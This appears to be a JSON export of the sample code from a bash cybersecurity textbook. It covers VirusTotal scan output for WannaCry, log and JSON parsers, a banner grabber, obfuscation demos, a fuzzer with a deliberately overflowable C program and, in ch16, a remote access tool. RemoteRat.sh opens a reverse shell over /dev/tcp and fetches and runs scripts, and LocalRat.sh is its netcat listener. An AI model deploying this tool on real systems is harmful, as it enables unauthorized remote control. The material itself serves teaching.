\"1a4e2c3bbc095cb7d9b85cabe2aea2c9a769b480\", \"resource\": \"284674a806bcbe692c76761baaf21327638de0c7135bfb06953648be7d661fbd\", \"response_code\": 1, \"scan_date\": \"2018-07-12 16:02:50\", \"permalink\": \"https://www.virustotal.com/file/284674a806bcbe692c76761baaf21327638de0c7135bfb06953648be7d661fbd/analysis/1531411370/\", \"verbose_msg\": \"Scan finished, information embedded\", \"total\": 66, \"positives\": 1, \"sha256\": \"284674a806bcbe692c76761baaf21327638de0c7135bfb06953648be7d661fbd\", \"md5\": \"afaf2cdf9981342c494b28630608f74a\"}"
  },
  {
    "path": "ch11/WannaCry_VT.txt",
    "content": "{\"scans\": {\"Bkav\": {\"detected\": true, \"version\": \"1.3.0.9466\", \"result\": \"W32.WannaCrypLTE.Trojan\", \"update\": \"20180712\"}, \"MicroWorld-eScan\": {\"detected\": true, \"version\": \"14.0.297.0\", \"result\": \"Trojan.Ransom.WannaCryptor.H\", \"update\": \"20180712\"}, \"CMC\": {\"detected\": false, \"version\": \"1.1.0.977\", \"result\": null, \"update\": \"20180712\"}, \"CAT-QuickHeal\": {\"detected\": true, \"version\": \"14.00\", \"result\": \"Trojan.Mauvaise.SL1\", \"update\": \"20180712\"}, \"McAfee\": {\"detected\": true, \"version\": \"6.0.6.653\", \"result\": \"Ransom-O\", \"update\": \"20180712\"}, \"Cylance\": {\"detected\": true, \"version\": \"2.3.1.101\", \"result\": \"Unsafe\", \"update\": \"20180712\"}, \"Zillya\": {\"detected\": true, \"version\": \"2.0.0.3593\", \"result\": \"Trojan.WannaCryptGen.Win32.2\", \"update\": \"20180712\"}, \"SUPERAntiSpyware\": {\"detected\": true, \"version\": \"5.6.0.1032\", \"result\": \"Ransom.WannaCrypt/Variant\", \"update\": \"20180712\"}, \"TheHacker\": {\"detected\": true, \"version\": \"6.8.0.5.3314\", \"result\": \"Trojan/Exploit.CVE-2017-0147.a\", \"update\": \"20180712\"}, \"K7GW\": {\"detected\": true, \"version\": \"10.53.27735\", \"result\": \"Exploit ( 0050d7a31 )\", \"update\": \"20180712\"}, \"K7AntiVirus\": {\"detected\": true, \"version\": \"10.53.27740\", \"result\": \"Exploit ( 0050d7a31 )\", \"update\": \"20180712\"}, \"Arcabit\": {\"detected\": false, \"version\": \"1.0.0.831\", \"result\": null, \"update\": \"20180712\"}, \"TrendMicro\": {\"detected\": true, \"version\": \"10.0.0.1040\", \"result\": \"WORM_WCRY.A\", \"update\": \"20180712\"}, \"Baidu\": {\"detected\": true, \"version\": \"1.0.0.2\", \"result\": \"Win32.Worm.Rbot.a\", \"update\": \"20180712\"}, \"NANO-Antivirus\": {\"detected\": true, \"version\": \"1.0.116.23366\", \"result\": \"Trojan.Win32.Wanna.eoqegc\", \"update\": \"20180712\"}, \"Cyren\": {\"detected\": true, \"version\": \"6.0.0.4\", 
\"result\": \"W32/Trojan.ZTSA-8671\", \"update\": \"20180712\"}, \"Symantec\": {\"detected\": true, \"version\": \"1.6.0.0\", \"result\": \"Ransom.Wannacry\", \"update\": \"20180712\"}, \"TotalDefense\": {\"detected\": false, \"version\": \"37.1.62.1\", \"result\": null, \"update\": \"20180712\"}, \"TrendMicro-HouseCall\": {\"detected\": true, \"version\": \"9.950.0.1006\", \"result\": \"WORM_WCRY.A\", \"update\": \"20180712\"}, \"Avast\": {\"detected\": true, \"version\": \"18.4.3895.0\", \"result\": \"Win32:WanaCry-A [Trj]\", \"update\": \"20180712\"}, \"ClamAV\": {\"detected\": true, \"version\": \"0.100.1.0\", \"result\": \"Win.Ransomware.WannaCry-6313787-0\", \"update\": \"20180712\"}, \"Kaspersky\": {\"detected\": true, \"version\": \"15.0.1.13\", \"result\": \"Trojan-Ransom.Win32.Wanna.m\", \"update\": \"20180712\"}, \"BitDefender\": {\"detected\": true, \"version\": \"7.2\", \"result\": \"Trojan.Ransom.WannaCryptor.H\", \"update\": \"20180712\"}, \"Babable\": {\"detected\": false, \"version\": \"9107201\", \"result\": null, \"update\": \"20180406\"}, \"Paloalto\": {\"detected\": true, \"version\": \"1.0\", \"result\": \"generic.ml\", \"update\": \"20180712\"}, \"AegisLab\": {\"detected\": true, \"version\": \"4.2\", \"result\": \"Troj.Ransom.W32!c\", \"update\": \"20180712\"}, \"Rising\": {\"detected\": true, \"version\": \"25.0.0.20\", \"result\": \"Exploit.EternalBlue!1.AAED (CLASSIC)\", \"update\": \"20180712\"}, \"Ad-Aware\": {\"detected\": true, \"version\": \"3.0.5.370\", \"result\": \"Trojan.Ransom.WannaCryptor.H\", \"update\": \"20180712\"}, \"Emsisoft\": {\"detected\": true, \"version\": \"2018.4.0.1029\", \"result\": \"Trojan-Ransom.WanaCrypt0r (A)\", \"update\": \"20180712\"}, \"Comodo\": {\"detected\": true, \"version\": \"29335\", \"result\": \"TrojWare.Win32.WannaCry.jet\", \"update\": \"20180712\"}, \"F-Secure\": {\"detected\": true, \"version\": \"11.0.19100.45\", \"result\": \"Trojan.Ransom.WannaCryptor.H\", \"update\": \"20180712\"}, 
\"DrWeb\": {\"detected\": true, \"version\": \"7.0.33.6080\", \"result\": \"Trojan.Encoder.11432\", \"update\": \"20180712\"}, \"VIPRE\": {\"detected\": true, \"version\": \"68066\", \"result\": \"Trojan.Win32.Generic!BT\", \"update\": \"20180712\"}, \"Invincea\": {\"detected\": true, \"version\": \"6.3.5.26121\", \"result\": \"heuristic\", \"update\": \"20180601\"}, \"McAfee-GW-Edition\": {\"detected\": true, \"version\": \"v2017.3010\", \"result\": \"BehavesLike.Win32.RansomWannaCry.wc\", \"update\": \"20180712\"}, \"Sophos\": {\"detected\": true, \"version\": \"4.98.0\", \"result\": \"Troj/Ransom-EMG\", \"update\": \"20180712\"}, \"SentinelOne\": {\"detected\": true, \"version\": \"1.0.17.227\", \"result\": \"static engine - malicious\", \"update\": \"20180701\"}, \"F-Prot\": {\"detected\": true, \"version\": \"4.7.1.166\", \"result\": \"W32/WannaCrypt.D\", \"update\": \"20180712\"}, \"Jiangmin\": {\"detected\": true, \"version\": \"16.0.100\", \"result\": \"Trojan.WanaCry.i\", \"update\": \"20180712\"}, \"Webroot\": {\"detected\": true, \"version\": \"1.0.0.403\", \"result\": \"W32.Ransom.Wannacry\", \"update\": \"20180712\"}, \"Avira\": {\"detected\": true, \"version\": \"8.3.3.6\", \"result\": \"TR/Ransom.IZ\", \"update\": \"20180712\"}, \"Fortinet\": {\"detected\": true, \"version\": \"5.4.247.0\", \"result\": \"W32/WannaCryptor.H!tr.ransom\", \"update\": \"20180712\"}, \"Antiy-AVL\": {\"detected\": true, \"version\": \"3.0.0.1\", \"result\": \"Trojan[Ransom]/Win32.Scatter\", \"update\": \"20180712\"}, \"Kingsoft\": {\"detected\": false, \"version\": \"2013.8.14.323\", \"result\": null, \"update\": \"20180712\"}, \"Endgame\": {\"detected\": true, \"version\": \"3.0.0\", \"result\": \"malicious (high confidence)\", \"update\": \"20180711\"}, \"Microsoft\": {\"detected\": true, \"version\": \"1.1.15000.2\", \"result\": \"Ransom:Win32/WannaCrypt\", \"update\": \"20180712\"}, \"ViRobot\": {\"detected\": true, \"version\": \"2014.3.20.0\", \"result\": 
\"Trojan.Win32.S.WannaCry.3723264.S\", \"update\": \"20180712\"}, \"ZoneAlarm\": {\"detected\": true, \"version\": \"1.0\", \"result\": \"Trojan-Ransom.Win32.Wanna.m\", \"update\": \"20180712\"}, \"Avast-Mobile\": {\"detected\": false, \"version\": \"180711-22\", \"result\": null, \"update\": \"20180712\"}, \"TACHYON\": {\"detected\": true, \"version\": \"2018-07-12.02\", \"result\": \"Ransom/W32.WannaCry.Zen\", \"update\": \"20180712\"}, \"AhnLab-V3\": {\"detected\": true, \"version\": \"3.13.1.21452\", \"result\": \"Trojan/Win32.WannaCryptor.R200572\", \"update\": \"20180712\"}, \"ALYac\": {\"detected\": true, \"version\": \"1.1.1.5\", \"result\": \"Trojan.Ransom.WannaCryptor\", \"update\": \"20180712\"}, \"AVware\": {\"detected\": true, \"version\": \"1.6.0.52\", \"result\": \"Trojan.Win32.Generic!BT\", \"update\": \"20180712\"}, \"MAX\": {\"detected\": true, \"version\": \"2017.11.15.1\", \"result\": \"malware (ai score=100)\", \"update\": \"20180712\"}, \"VBA32\": {\"detected\": true, \"version\": \"3.12.32.0\", \"result\": \"TrojanRansom.Wanna\", \"update\": \"20180712\"}, \"Malwarebytes\": {\"detected\": true, \"version\": \"2.1.1.1115\", \"result\": \"Ransom.WannaCrypt\", \"update\": \"20180712\"}, \"Zoner\": {\"detected\": true, \"version\": \"1.0\", \"result\": \"Trojan.Wannacry\", \"update\": \"20180711\"}, \"ESET-NOD32\": {\"detected\": true, \"version\": \"17703\", \"result\": \"Win32/Exploit.CVE-2017-0147.A\", \"update\": \"20180712\"}, \"Tencent\": {\"detected\": true, \"version\": \"1.0.0.1\", \"result\": \"Trojan.Win32.WannaCry.b\", \"update\": \"20180712\"}, \"Yandex\": {\"detected\": true, \"version\": \"5.5.1.3\", \"result\": \"Exploit.CVE-2017-0147!\", \"update\": \"20180712\"}, \"Ikarus\": {\"detected\": true, \"version\": \"0.1.5.2\", \"result\": \"Trojan-Ransom.WannaCry\", \"update\": \"20180712\"}, \"eGambit\": {\"detected\": false, \"version\": null, \"result\": null, \"update\": \"20180712\"}, \"GData\": {\"detected\": true, \"version\": 
\"A:25.17758B:25.12706\", \"result\": \"Win32.Trojan-Ransom.WannaCry.D\", \"update\": \"20180712\"}, \"AVG\": {\"detected\": true, \"version\": \"18.4.3895.0\", \"result\": \"Win32:WanaCry-A [Trj]\", \"update\": \"20180712\"}, \"Cybereason\": {\"detected\": true, \"version\": \"1.2.27\", \"result\": \"malicious.7c37d2\", \"update\": \"20180225\"}, \"Panda\": {\"detected\": true, \"version\": \"4.6.4.2\", \"result\": \"Trj/RansomCrypt.K\", \"update\": \"20180712\"}, \"CrowdStrike\": {\"detected\": true, \"version\": \"1.0\", \"result\": \"malicious_confidence_100% (W)\", \"update\": \"20180530\"}, \"Qihoo-360\": {\"detected\": true, \"version\": \"1.0.0.1120\", \"result\": \"Win32/Trojan.Multi.daf\", \"update\": \"20180712\"}}, \"scan_id\": \"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c-1531416969\", \"sha1\": \"e889544aff85ffaf8b0d0da705105dee7c97fe26\", \"resource\": \"db349b97c37d22f5ea1d1841e3c89eb4\", \"response_code\": 1, \"scan_date\": \"2018-07-12 17:36:09\", \"permalink\": \"https://www.virustotal.com/file/24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c/analysis/1531416969/\", \"verbose_msg\": \"Scan finished, information embedded\", \"total\": 68, \"positives\": 61, \"sha256\": \"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c\", \"md5\": \"db349b97c37d22f5ea1d1841e3c89eb4\"}"
  },
  {
    "path": "ch11/helloworld.c",
    "content": "#include <stdio.h>\n\nint main()\n{\n  printf(\"Hello World!\\n\");\n  return 0;\n}\n"
  },
  {
    "path": "ch11/vtjson.awk",
    "content": "# Cybersecurity Ops with bash\n# vtjson.awk\n#\n# Description: \n# Search a JSON file for VirusTotal malware hits\n#\n# Usage:\n# vtjson.awk <json file>\n#   <json file> File containing results from VirusTotal\n#\n\nFN=\"${1:-Calc_VirusTotal.txt}\"\nsed -e 's/{\"scans\": {/&\\n /' -e 's/},/&\\n/g' \"$FN\" |     # <1>\nawk '\nNF == 9 {                                       # <2>\n    COMMA=\",\"\n    QUOTE=\"\\\"\"                                  # <3>\n    if ( $3 == \"true\" COMMA ) {                 # <4>\n        VIRUS=$1                                # <5>\n        gsub(QUOTE, \"\", VIRUS)                  # <6>\n\n        RESLT=$7\n        gsub(QUOTE, \"\", RESLT)\n        gsub(COMMA, \"\", RESLT)\n\n        print VIRUS, \"- result:\", RESLT\n    }\n}'\n\n"
  },
  {
    "path": "ch11/vtjson.sh",
    "content": "#!/bin/bash -\n#\n# Rapid Cybersecurity Ops\n# vtjson.sh\n#\n# Description: \n# Search a JSON file for VirusTotal malware hits\n#\n# Usage:\n# vtjson.awk [<json file>]\n#   <json file> File containing results from VirusTotal\n#               default: Calc_VirusTotal.txt\n#\n\nRE='^.(.*)...\\{.*detect..(.*),..vers.*result....(.*).,..update.*$'     # <1>\n\nFN=\"${1:-Calc_VirusTotal.txt}\"\nsed -e 's/{\"scans\": {/&\\n /' -e 's/},/&\\n/g' \"$FN\" |           # <2>\nwhile read ALINE\ndo\n    if [[ $ALINE =~ $RE ]]                                     # <3>\n    then\n\tVIRUS=\"${BASH_REMATCH[1]}\"                                    # <4>\n\tFOUND=\"${BASH_REMATCH[2]}\"\n\tRESLT=\"${BASH_REMATCH[3]}\"\n\tif [[ $FOUND =~ .*true.* ]]                                   # <5>\n\tthen\n\t    echo $VIRUS \"- result:\" $RESLT\n\tfi\n    fi\ndone\n"
  },
  {
    "path": "ch12/tagit.sh",
    "content": "#!/bin/bash -\n#\n# Cybersecurity Ops with bash\n# tagit.sh\n#\n# Description: \n# Place open and close tags around a string\n#\n# Usage:\n# tagit.sh <tag> <string>\n#   <tag> Tag to use\n#   <string> String to tag\n#\n\nprintf '<%s>%s</%s>\\n' \"${1}\" \"${2}\" \"${1}\"\n"
  },
  {
    "path": "ch12/webdash.sh",
    "content": "#!/bin/bash -\n#\n# Rapid Cybersecurity Ops\n# webdash.sh\n#\n# Description: \n# Create an information dashboard\n# Heading\n# --------------\n# 1-line of output\n# --------------\n# 5 lines of output\n# ...\n# --------------\n# column labels and then\n# 8 lines of histograms\n# ...\n# --------------\n#\n\n# some important constant strings\nUPTOP=$(tput cup 0 0)                               # <1>\nERAS2EOL=$(tput el)\nREV=$(tput rev)\t\t# reverse video\nOFF=$(tput sgr0)\t# general reset\nSMUL=$(tput smul)\t# underline mode on (start)\nRMUL=$(tput rmul)\t# underline mode off (reset)\nCOLUMNS=$(tput cols)\t# how wide is our window\n# DASHES='------------------------------------'\nprintf -v DASHES '%*s' $COLUMNS '-'                 # <2>\nDASHES=${DASHES// /-}\n\n#\n# prSection - print a section of the screen \n#       print $1-many lines from stdin\n#       each line is a full line of text \n#       followed by erase-to-end-of-line\n#       sections end with a line of dashes\n#\nfunction prSection ()\n{\n    local -i i\t\t\t\t\t    # <3>\n    for((i=0; i < ${1:-5}; i++))\n    do\n        read aline\n        printf '%s%s\\n' \"$aline\" \"${ERAS2EOL}\"\t    # <4>\n    done\n    printf '%s%s\\n%s' \"$DASHES\" \"${ERAS2EOL}\" \"${ERAS2EOL}\"\n}\n\nfunction cleanup()\t\t\t\t    # <5>\n{\n    if [[ -n $BGPID ]] \n    then\n      kill %1\t\t\t\t\t    # <6>\n      rm -f $TMPFILE\n    fi\n} &> /dev/null\t\t\t\t\t    # <7>\n\ntrap cleanup EXIT \n\n# launch the bg process\nTMPFILE=$(tempfile)                                 # <8>\n{ bash tailcount.sh $1 | \\\n  bash livebar.sh > $TMPFILE ; } &                  # <9>\nBGPID=$!\n\nclear\nwhile true\ndo\n    printf '%s' \"$UPTOP\"\n    # heading:\n    echo \"${REV}Rapid Cyber Ops Ch. 
12 -- Security Dashboard${OFF}\" \\\n    | prSection 1\n    #----------------------------------------\n    {                                               # <10>\n      printf 'connections:%4d        %s\\n' \\\n            $(netstat -an | grep 'ESTAB' | wc -l) \"$(date)\" \n    } | prSection 1\n    #----------------------------------------\n    tail -5 /var/log/syslog | cut -c 1-16,45-105 | prSection 5 \n    #----------------------------------------\n    { echo \"${SMUL}yymmdd${RMUL}\"    \\\n            \"${SMUL}hhmmss${RMUL}\"  \\\n            \"${SMUL}count of events${RMUL}\"\n      tail -8 $TMPFILE \n    } | prSection 9\n    sleep 3\ndone\n"
  },
  {
    "path": "ch12/weblogfmt.sh",
    "content": "#!/bin/bash -\n#\n# Cybersecurity Ops with bash\n# weblogfmt.sh\n#\n# Description: \n# Read in Apache web log and output as HTML\n#\n# Usage:\n# weblogfmt.sh input.file > output.file\n#\n\nfunction tagit()\n{\n\tprintf '<%s>%s</%s>\\n' \"${1}\" \"${2}\" \"${1}\"\n}\n\n#basic header tags\necho \"<html>\"                                            # <1>\necho \"<body>\"\necho \"<h1>$1</h1>\"   #title\n\necho \"<table border=1>\"   #table with border\necho \"<tr>\"   #new table row\necho \"<th>IP Address</th>\"  #column header\necho \"<th>Date</th>\"\necho \"<th>URL Requested</th>\"\necho \"<th>Status Code</th>\"\necho \"<th>Size</th>\"\necho \"<th>Referrer</th>\"\necho \"<th>User Agent</th>\"\necho \"</tr>\"\n\nwhile read f1 f2 f3 f4 f5 f6 f7 f8 f9 f10 f11 f12plus    # <2>\ndo\n\techo \"<tr>\"\n\ttagit \"td\" \"${f1}\"\n\ttagit \"td\" \"${f4} ${f5}\"                        # <3>\n\ttagit \"td\" \"${f6} ${f7}\"\n\ttagit \"td\" \"${f9}\"\n\ttagit \"td\" \"${f10}\"\n\ttagit \"td\" \"${f11}\"\n\ttagit \"td\" \"${f12plus}\"\n\techo \"</tr>\"\ndone < $1\n\n#close tags\necho \"</table>\"\necho \"</body>\"\necho \"</html>\"\n\n"
  },
  {
    "path": "ch13/bannergrabber.sh",
    "content": "#!/bin/bash -\n#\n# Cybersecurity Ops with bash\n# bannergrabber.sh\n#\n# Description:\n# Automatically pull the banners from HTTP, SMTP,\n# and FTP servers\n#\n# Usage: ./bannergrabber.sh  hostname [scratchfile]\n#   scratchfile is used during processing but removed;\n#   default is: \"scratch.file\" or tempfile-generated name\n#\n\n#\nfunction isportopen ()\n{\n    (( $# < 2 )) && return 1                           # <1>\n    local host port\n    host=$1\n    port=$2\n    echo >/dev/null 2>&1  < /dev/tcp/${host}/${port}   # <2>\n    return $?\n}\n\nfunction cleanup ()\n{\n    rm -f \"$SCRATCH\"\n}\n\nATHOST=\"$1\"\nSCRATCH=\"$2\"\nif [[ -z $2 ]]\nthen\n    if [[ -n $(type -p tempfile) ]]\n    then\n\tSCRATCH=$(tempfile)\n    else\n    \tSCRATCH='scratch.file'\n    fi\nfi\n\ntrap cleanup EXIT                                      # <3>\ntouch \"$SCRATCH\"                                       # <4>\n\nif isportopen $ATHOST 21\t# FTP                  <5>\nthen\n    # i.e., ftp -n $ATHOST \n    exec 3<>/dev/tcp/${ATHOST}/21                      # <6>\n    echo -e 'quit\\r\\n' >&3                             # <7>\n    cat <&3  >> \"$SCRATCH\"                             # <8>\nfi\n\nif isportopen $ATHOST 25\t# SMTP\nthen\n    # i.e., telnet $ATHOST 25 \n    exec 3<>/dev/tcp/${ATHOST}/25\n    echo -e 'quit\\r\\n' >&3\n    cat <&3  >> \"$SCRATCH\"\nfi\n\nif isportopen $ATHOST 80\t# HTTP\nthen\n    curl -LIs \"https://${ATHOST}\"  >> \"$SCRATCH\"      # <9>\nfi\n\ncat \"$SCRATCH\"                                        # <10>\n\n"
  },
  {
    "path": "ch13/smtpconnect.sh",
    "content": "#!/bin/bash -\n#\n# Cybersecurity Ops with bash\n# smtpconnect.sh\n#\n# Description: \n# Connect to a SMTP server and print welcome banner\n#\n# Usage:\n# smtpconnect.sh <host>\n#   <host> SMTP server to connect to\n#\n\nexec 3<>/dev/tcp/\"$1\"/25\necho -e 'quit\\r\\n' >&3\ncat <&3\n"
  },
  {
    "path": "ch14/askey.sh",
    "content": "\n# functions to convert decimal to ascii and vice-versa\n\n# aschar - print the ascii character representation\n#          of the number passed in as an argument\n# example: aschar 65 ==> A\n#\nfunction aschar ()\n{\n    local ashex                             # <1>\n    printf -v ashex '\\\\x%02x' $1            # <2>\n    printf '%b' $ashex                      # <3>\n}\n\n# asnum - print the ascii (decimal) number\n#         of the character passed in as $1\n# example: asnum A ==> 65\n#\nfunction asnum ()\n{\n    printf '%d' \"\\\"$1\"                        # <4>\n}\n"
  },
  {
    "path": "ch14/innerscript.sh",
    "content": "echo \"This is an encrypted script\"\necho \"running uname -a\"\nuname -a\n"
  },
  {
    "path": "ch14/logfuscate.sh",
    "content": "#!/bin/bash -\n#\n# Cybersecurity Ops with bash\n# logfuscate.sh\n#\n# Description: \n# Demonstration of logic obfuscation\n#\n\nf=\"$1\"  #<1>\n\na() (\n\tb()\n\t{\n\t\tf=\"$(($f+5))\"  #<5>\n\t\tg=\"$(($f+7))\"  #<6>\n\t\tc  #<7>\n\t}\n\n\tb  #<4>\n)\n\nc() (\n\td()\n\t{\n\t\tg=\"$(($g-$f))\"  #<10>\n\t\tf=\"$(($f-2))\"  #<11>\n\t\techo \"$f\"  #<12>\n\t}\n\tf=\"$(($f-3))\"  #<8>\n\td  #<9>\n)\n\nf=\"$(($f+$2))\"  #<2>\na  #<3>\n"
  },
  {
    "path": "ch14/oneline.sh",
    "content": "#!/bin/bash -\n#\n# Cybersecurity Ops with bash\n# oneline.sh\n#\n# Description: \n# Demonstration of one-line script obfuscation\n#\n\nif [[ $1 == \"test\" ]]; then echo \"testing\"; else echo \"not testing\"; fi; echo\n\"some command\"; echo \"another command\"\n"
  },
  {
    "path": "ch14/readable.sh",
    "content": "#!/bin/bash -\n#\n# Cybersecurity Ops with bash\n# readable.sh\n#\n# Description: \n# Simple script to be obfuscated\n#\n\nif [[ $1 == \"test\" ]]\nthen \n  echo \"testing\"\nelse \n  echo \"not testing\" \nfi \n\necho \"some command\"\necho \"another command\"\n"
  },
  {
    "path": "ch14/streamcipher.sh",
    "content": "#!/bin/bash -\n#\n# Cybersecurity Ops with bash\n# streamcipher.sh\n#\n# Description: \n# A lightweight implementation of a stream cipher\n# Pedagogical - not recommended for serious use\n#\n# Usage:\n# streamcipher.sh [-d] <key>  < inputfile\n#   -d Decrypt mode\n#   <key> Numeric key\n#\n#\n\nsource ./askey.sh                                          # <1>\n\n#\n# Ncrypt - Encrypt - reads in characters\n#           outputs 2digit hex #s\n#\nfunction Ncrypt ()                                         # <2>\n{\n    TXT=\"$1\"\n    for((i=0; i< ${#TXT}; i++))                            # <3>\n    do\n\tCHAR=\"${TXT:i:1}\"                                  # <4>\n\tRAW=$(asnum \"$CHAR\") # \" \" needed for space (32)   # <5>\n\tNUM=${RANDOM}\n\tCOD=$(( RAW ^ ( NUM & 0x7F )))                     # <6>\n\tprintf \"%02X\" \"$COD\"                               # <7>\n    done\n    echo\t\t\t\t\t\t   # <8>\n}\n\n#\n# Dcrypt - DECRYPT - reads in a 2digit hex #s\n#           outputs characters\n#\nfunction Dcrypt ()                                  # <9>\n{\n    TXT=\"$1\"\n    for((i=0; i< ${#TXT}; i=i+2))                   # <10>\n    do\n\tCHAR=\"0x${TXT:i:2}\"                         # <11>\n\tRAW=$(( $CHAR ))                            # <12>\n\tNUM=${RANDOM}\n\tCOD=$(( RAW ^ ( NUM & 0x7F )))              # <13>\n\taschar \"$COD\"                               # <14>\n    done\n    echo\n}\n\nif [[ -n $1  &&  $1 == \"-d\" ]]                      # <15>\nthen\n    DECRYPT=\"YES\" \n    shift                                           # <16>\nfi\n\nKEY=${1:-1776}                                      # <17>\nRANDOM=\"${KEY}\"                                     # <18>\nwhile read -r                                       # <19>\ndo\n    if [[ -z $DECRYPT ]]\t                    # <20>\n    then \n\tNcrypt \"$REPLY\"\n    else\n\tDcrypt \"$REPLY\"\n    fi\n\ndone \n"
  },
  {
    "path": "ch14/synfuscate.sh",
    "content": "#!/bin/bash -\n#\n# Cybersecurity Ops with bash\n# synfuscate.sh\n#\n# Description: \n# Demonstration of syntax script obfuscation\n#\n\na ()   #<1>\n{\n\n\tlocal a=\"Local Variable a\"   #<2>\n\techo \"$a\"\n}\n\na=\"Global Variable a\"   #<3>\necho \"$a\"\n\na\n"
  },
  {
    "path": "ch14/wrapper.sh",
    "content": "#!/bin/bash -\n#\n# Cybersecurity Ops with bash\n# wrapper.sh\n#\n# Description: \n# Example of executing an encrypted \"wrapped\" script\n#\n# Usage:\n# wrapper.sh\n#    Enter the password when prompted\n#\n\nencrypted='U2FsdGVkX18WvDOyPFcvyvAozJHS3tjrZIPlZM9xRhz0tuwzDrKhKBBuugLxzp7T\nMoJoqx02tX7KLhATS0Vqgze1C+kzFxtKyDAh9Nm2N0HXfSNuo9YfYD+15DoXEGPd'   #<1>\n\nread -s word    #<2>\n\ninnerScript=$(echo \"$encrypted\" | openssl aes-256-cbc -base64 -d -pass pass:\"$word\")   #<3>\n\neval \"$innerScript\"   #<4>\n\n"
  },
  {
    "path": "ch15/fuzzer.sh",
    "content": "#!/bin/bash -\n#\n# Cybersecurity Ops with bash\n# fuzzer.sh\n#\n# Description: \n# Fuzz a specified argument of a program\n#\n# Usage:\n# bash fuzzer.sh <executable> <arg1> [?] <arg3> ... \n#   <executable> The target executable program/script\n#   <argn> The static arguments for the executable\n#   '?' The argument to be fuzzed\n#   example:  fuzzer.sh ./myprog -t '?' fn1 fn2\n#\n\n#\nfunction usagexit ()                            # <1>\n{\n    echo \"usage: $0 executable args\"\n    echo \"example: $0 myapp -lpt arg \\?\"\n    exit 1\n} >&2\t\t\t\t\t\t# <2>\n\nif (($# < 2))\t\t\t\t\t# <3>\nthen\n    usagexit\nfi\n\n# the app we will fuzz is the first arg\nTHEAPP=\"$1\"\nshift\t\t\t\t\t\t# <4>\n# is it really there?\ntype -t \"$THEAPP\" >/dev/null  || usagexit    # <5>\n\n# which arg to vary?\n# find the ? and note its position\ndeclare -i i\nfor ((i=0; $# ; i++))\t\t\t\t# <6>\ndo\n    ALIST+=( \"$1\" )\t\t\t\t# <7>\n    if [[ $1 == '?' ]]\n    then\n\tNDX=$i\t\t\t\t\t# <8>\n    fi\n    shift\ndone\n\n# printf \"Executable: %s  Arg: %d %s\\n\" \"$THEAPP\" $NDX \"${ALIST[$NDX]}\"\n\n# now fuzz away:\nMAX=10000\nFUZONE=\"a\"\nFUZARG=\"\"\nfor ((i=1; i <= MAX; i++))\t\t\t# <9>\ndo\n    FUZARG=\"${FUZARG}${FUZONE}\"  # aka +=\n    ALIST[$NDX]=\"$FUZARG\"\n    # order of >s is important\n    $THEAPP \"${ALIST[@]}\"  2>&1 >/dev/null      # <10>\n    if (( $? )) ; then echo \"Caused by: $FUZARG\" >&2 ; fi  # <11>\ndone\n\n"
  },
  {
    "path": "ch15/fuzzme.c",
    "content": "#include <stdio.h>\n#include <string.h>\n\n//Cybersecurity Ops with bash\n//Warning - This is an insecure program and is for demonstration\n//purposes only\n\nint main(int argc, char *argv[])\n{\n\tchar combined[50] = \"\";\n\tstrcat(combined, argv[1]);\n\tstrcat(combined, \" \");\n\tstrcat(combined, argv[2]);\n\tprintf(\"The two arguments combined is: %s\\n\", combined);\n\t\n\treturn(0);\n}\n"
  },
  {
    "path": "ch16/LocalRat.sh",
    "content": "#!/bin/bash -\n#\n# Cybersecurity Ops with bash\n# LocalRat.sh\n#\n# Description: \n# Remote access tool to be run on a local system,\n# it listens for a connection from the remote system\n# and helps with any file transfer requested\n#\n# Usage:  LocalRat.sh  port1 [port2 [port3]]\n# \n#\n\n# define our background file transfer daemon\nfunction bgfilexfer ()\n{\n    while true\n    do\n        FN=$(nc -nlvvp $HOMEPORT2 2>>/tmp/x2.err)       # <3>\n        if [[ $FN == 'exit' ]] ; then exit ; fi\n        nc -nlp $HOMEPORT3 < $FN                        # <4>\n    done\n}\n\n\n# -------------------- main ---------------------\nHOMEPORT=$1\nHOMEPORT2=${2:-$((HOMEPORT+1))}\nHOMEPORT3=${3:-$((HOMEPORT2+1))}\n\n# initiate the background file transfer daemon\nbgfilexfer &                                            # <1>\n\n# listen for an incoming connection \nnc -nlvp $HOMEPORT                                      # <2>\n\n"
  },
  {
    "path": "ch16/RemoteRat.sh",
    "content": "#!/bin/bash -\n#\n# Cybersecurity Ops with bash\n# RemoteRat.sh\n#\n# Description: \n# Remote access tool to be run on the remote system;\n# mostly hands any input to the shell\n# but if indicated (with a !) fetch and run a script\n#\n# Usage:  RemoteRat.sh  hostname port1 [port2 [port3]]\n# \n\n\nfunction cleanup ()\n{\n    rm -f $TMPFL\n}\n\nfunction runScript ()\n{\n    # tell 'em what script we want\n    echo \"$1\" > /dev/tcp/${HOMEHOST}/${HOMEPORT2}     # <7>\n    # stall \n    sleep 1                                           # <8>\n    if [[ $1 == 'exit' ]] ; then exit ; fi\n    cat > $TMPFL </dev/tcp/${HOMEHOST}/${HOMEPORT3}   # <9>\n    bash $TMPFL                                       # <10>\n}\n\n# -------------------  MAIN -------------------\n# could do some error checking here \nHOMEHOST=$1\nHOMEPORT=$2\nHOMEPORT2=${3:-$((HOMEPORT+1))}\nHOMEPORT3=${4:-$((HOMEPORT2+1))}\n\nTMPFL=\"/tmp/$$.sh\"\ntrap cleanup EXIT\n\n# phone home:\nexec  </dev/tcp/${HOMEHOST}/${HOMEPORT} 1>&0 2>&0     # <1>\n\nwhile true\ndo\n    echo -n '$ '                                      # <2>\n    read -r                                           # <3>\n    if [[ ${REPLY:0:1} == '!' ]]                      # <4>\n    then\n\t# it's a script\n        FN=${REPLY:1}                                 # <5>\n\trunScript $FN\n    else\n\t# normal case - run the cmd\n\teval \"$REPLY\"                                 # <6>\n    fi\ndone\n\n"
  },
  {
    "path": "ch19/pingmonitor.sh",
